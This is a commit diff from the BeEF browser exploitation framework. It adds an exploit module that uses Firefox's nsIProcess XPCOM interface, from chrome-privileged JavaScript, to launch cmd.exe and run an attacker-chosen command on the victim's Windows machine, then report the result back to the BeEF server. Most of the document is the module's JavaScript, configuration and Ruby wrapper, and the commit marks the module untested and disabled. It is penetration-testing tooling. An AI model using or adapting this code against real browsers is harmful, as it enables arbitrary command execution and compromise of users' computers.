Added module Mozilla nsIProcess XPCOM Interface

This module is a port of the same module from BeEF-0.4.0.0

It has not been tested. It is currently disabled.

Part of issue 506

modules/exploits/mozilla_nsiprocess_interface/command.js

@@ -0,0 +1,36 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var result = "command sent";
+
+	try {
+		var command_str = "<%= command_str.gsub!(/"/, '\\"') %>";
+		var getWorkingDir= Components.classes["@mozilla.org/file/directory_service;1"].getService(Components.interfaces.nsIProperties).get("Home",Components.interfaces.nsIFile);
+		var lFile = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
+		var lPath = "C:\\WINDOWS\\system32\\cmd.exe"; // maybe "%WINDIR%\\system32\\cmd.exe" would work?
+		lFile.initWithPath(lPath);
+		var process = Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
+		process.init(lFile);
+		process.run(false,['/c', command_str],2);
+	} catch (e) {
+		result = "an unexpected error occured";
+	}
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+result);
+
+});
+

modules/exploits/mozilla_nsiprocess_interface/config.yaml

@@ -0,0 +1,31 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        mozilla_nsiprocess_interface:
+            enable: false
+            category: "Exploits"
+            name: "Mozilla nsIProcess XPCOM Interface (Windows)"
+            description: "The nsIProcess XPCOM interface represents an executable process. JavaScript code with chrome privileges can use the nsIProcess interface to launch executable files. In this module, nsIProcess is combined with the Windows command prompt cmd.exe<br /><br />Any XSS injection in a chrome privileged zone (e.g. typically in Firefox extensions) allows this module to execute arbitrary commands on the victim machine."
+            authors: ["wade", "bcoles", "roberto.suggi@security-assessment.com", "nick.freeman@security-assessment.com"]
+            target:
+                working:
+                    FF:
+                        min_ver: 1
+                        # It's actually 3.5 but min_ver only supports integers
+                        max_ver: 3
+                not_working: ["All"]
+

modules/exploits/mozilla_nsiprocess_interface/module.rb

@@ -0,0 +1,32 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+# This module is a port of the same module from BeEF-0.4.0.0
+# It has not been tested
+class Mozilla_nsiprocess_interface < BeEF::Core::Command
+
+	def self.options
+		return [
+			{'name' => 'ports', 'ui_label' => 'Windows Command', 'value' => 'ping localhost'}
+		]
+	end
+
+	def post_execute
+		content = {}
+		content['result'] = @datastore['result']
+		save content
+	end
+
+end